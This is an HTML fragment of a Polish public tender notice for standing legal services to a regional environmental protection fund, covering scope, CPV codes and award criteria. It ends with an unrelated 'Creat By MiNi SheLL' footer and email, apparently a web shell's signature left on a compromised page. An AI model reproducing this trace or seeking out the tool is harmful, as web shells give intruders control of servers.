Zamawiający zaleca aby przy składaniu wniosku o dopuszczenie do udziału w postępowaniu korzystać z następujących wzorów oświadczeń zamieszczonych na stronie internetowej Zamawiającego:
1) Wzór wniosku o dopuszczenie do udziału w postępowaniu
2)oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. l (zał. nr 1);
3)oświadczenie wykonawcy o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. l ustawy Pzp (zał. nr 2);
4)wykaz osób przewidzianych do realizacji zamówienia (zał. nr 3), 
5)wykaz wykonanych głównych usług z uwzględnieniem usług potwierdzających spełnianie warunku udziału w postępowaniu ( zał. nr 4);
6)lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z pózn. zm.), albo informacja o tym, że wykonawca nie należy do grupy kapitałowej wg zał. nr );
Oferty zostaną ocenione w oparciu o w/w kryteria przy czym podstawę oceny w zakresie kryteriów: wiedzy i doświadczenia oraz potencjału kadrowego będą stanowiły dokumenty złożone przez Wykonawcę wraz z wnioskiem o dopuszczenie do udziału w postępowaniu i punktację przyznaną Wykonawcom na etapie dokonywania ich wyboru celem zaproszenia do składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świadczenie stałej pomocy prawnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w zakresie zadania nr 1 jest świadczenie stałej pomocy prawnej polegającej w szczególności na: 
a)udzielaniu porad prawnych;
b)udzielaniu bieżących konsultacji prawnych;
c)sporządzaniu opinii prawnych;
d)opiniowaniu projektów umów;
e)opiniowaniu dokumentów objętych działalnością prowadzoną przez Zamawiającego (WFOŚiGW) w tym projektów uchwał Rady Nadzorczej;
f)opiniowaniu wewnętrznych dokumentów (regulaminów, instrukcji, zarządzeń, etc.) związanych z działalnością Zamawiającego; 
g)reprezentowaniu Zamawiającego w postępowaniach sądowych, administracyjnych, sądowo-administracyjnych, egzekucyjnych, arbitrażowych oraz przed osobami trzecimi;
h)reprezentowaniu Zamawiającego oraz udział w prowadzonych przez niego negocjacjach, rokowaniach i spotkaniach;
i)bieżącym informowaniu o zmianach w prawie mających wpływ na działalność prowadzoną przez Zamawiającego, w tym w formie cyklicznych - miesięcznych - informacji oraz ewentualnych spotkań/szkoleń z pracownikami Zamawiającego; 
j)doradztwie w rozpatrywaniu prawnych form zabezpieczeń, wierzytelności Zamawiającego;
k)doradztwie w sprawach windykacji należności;
l)wykonywaniu innych czynności o charakterze pomocy prawnej;
m)udzielaniu doraźnych roboczych konsultacji (telefonicznie lub mailowo),
n)świadczeniu pomocy prawnej obejmującej w szczególności następujące dziedziny: 
prawo ochrony środowiska, ustawa o zapobieganiu szkodom w środowisku, 
ustawa o odpadach, ustawa o utrzymaniu porządku i czystości w gminie, 
prawo wodne; prawo cywilne, prawo handlowe,	prawo finansowe, dyscyplina finansów publicznych, prawo podatkowe, prawo administracyjne, pomoc publiczna, prawo unijne, prawo bankowe, prawo budowlane, ustawa o działalności leczniczej, dochodzenie należności w tym m.in.: prawo upadłościowe i naprawcze, postępowanie sądowe, pozasądowe i egzekucyjne.
Zamawiający wymaga, aby każdy prawnik realizujący usługę w imieniu Wykonawcy w ramach codziennych dyżurów, zapewniał obsługę prawną w całym zakresie określonym dla Zadania nr 1. 
Zamawiający zastrzega sobie możliwość żądania od Wykonawcy w trakcie realizacji umowy, aby we wskazanych przez niego terminach, dwa lub trzy razy w tygodniu dyżur pełniła osoba wskazana w wykazie potencjału kadrowego jako osoba z doświadczeniem w zakresie prawnych form zabezpieczenia spłat. O konieczności takiej zmiany w  harmonogramie dyżurów Wykonawca będzie powiadamiany z co najmniej dwutygodniowym wyprzedzeniem pisemnie lub drogą mailową. Zmiana harmonogramu dyżurów nie będzie rozumiana jako zmiana umowy
a)	w zakresie zadania nr 1 - zasadniczym miejscem świadczenia obsługi prawnej jest siedziba Zamawiającego, w której Zamawiający zapewnia Wykonawcy stosowne pomieszczenie na codzienne dyżury, każdego dnia od poniedziałku do piątku w godz. między 8 00 a 16 00, w wymiarze 6 godzin dziennie. Wyjątkowo, zamówienie - po uzgodnieniu niniejszego przez strony - może być wykonywane również w innym miejscu wskazanym przez Wykonawcę. W przypadku zastępstwa prawnego lub procesowego lub na żądanie Zamawiającego usługa może być świadczona poza siedzibą Zamawiającego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8, 79.11.11.00-5, 79.11.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wiedza i doświadczenie Wykonawcy w świadczeniu obsługi prawnej w zakresie określonym dla zadania nr 1 - 20</li>
<li>3. Potencjał kadrowy w zakresie określonym dla zadania nr 1 - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie stałej pomocy prawnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w zakresie zadania nr 2 jest świadczenie stałej pomocy prawnej polegającej w szczególności na:
a)udzielaniu pomocy prawnej w zakresie związanym z działalnością organów statutowych Zamawiającego i ich relacji z organami administracji publicznej;
b)sygnalizowaniu i opiniowaniu projektowanych rozwiązań legislacyjnych mających związek z działalnością statutową Zamawiającego;
c)sporządzaniu opinii prawnych w zakresie odnoszącym się do udzielania pomocy publicznej i nadzoru z tym związanego;
d)wydawaniu opinii prawnych w sprawach wiążących się z możliwością zaangażowania Zamawiającego w postępowanie przed sądami i innymi organami;
e)sporządzaniu opinii prawnych w zakresie Ustawy Prawo zamówień publicznych, w tym również w zakresie postępowań realizowanych w ramach POIiŚ, z  uwzględnieniem zgodności tych postępowań z prawem UE;
f)sporządzaniu opinii prawnych w zakresie Prawa pracy;
g)sporządzaniu opinii prawnych w zakresie dotyczącym zaangażowania Funduszu w obsługę zagranicznych środków pomocowych;
h)prowadzeniu postępowań administracyjnych oraz sporządzanie pism i projektów decyzji w postępowaniach administracyjnych dotyczących zwrotu, umarzania, rozkładania na raty i odraczania terminów spłaty należności z tytułu płatności dokonanych w ramach środków pochodzących z Unii Europejskiej,
i)udzielaniu doraźnych roboczych konsultacji (telefonicznie lub mailowo),
j)udziale w spotkaniach z beneficjentami, dla których Fundusz pełni rolę Instytucji Wdrażającej ( przewidywana liczba spotkań w ciągu roku - nie więcej niż 5),
k)zastępstwie prawnym Zamawiającego w postępowaniu administracyjnym, sądowym i sądowo-administracyjnym w zakresie zadań wymienionych powyżej w lit. a) do g). 
w zakresie zadania nr 2 - obsługa prawna świadczona będzie w zależności od potrzeby i uzgodnienia Stron - w Kancelarii, w siedzibie Zamawiającego, względnie w każdym innym miejscu (sąd, organ administracyjny, siedziba innego podmiotu), w którym zgodnie ze stanem danej sprawy lub zgodnie ze zleceniem Zamawiającego wymagana jest obecność pomocy (asysty) prawnej. Wykonywanie czynności obejmujących zakres zadania nr 2 (za wyjątkiem doraźnych roboczych konsultacji, o których mowa w rozdziale I pkt 2 lit. i) poprzedzone będzie każdorazowo pisemnym zleceniem udzielonym przez osobę/komórkę organizacyjną wskazaną przez Zamawiającego, zawierającym zakres, formę  oraz termin realizacji. Zlecenie będzie przekazywane Wykonawcy faksem lub pocztą elektroniczną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8, 79.11.10.00-5, 79.11.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wiedza i doświadczenie Wykonawcy w świadczeniu obsługi prawnej w zakresie określonym dla zadania nr 2 - 20</li>
<li>3. Potencjał kadrowy w zakresie określonym dla zadania nr 2 - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com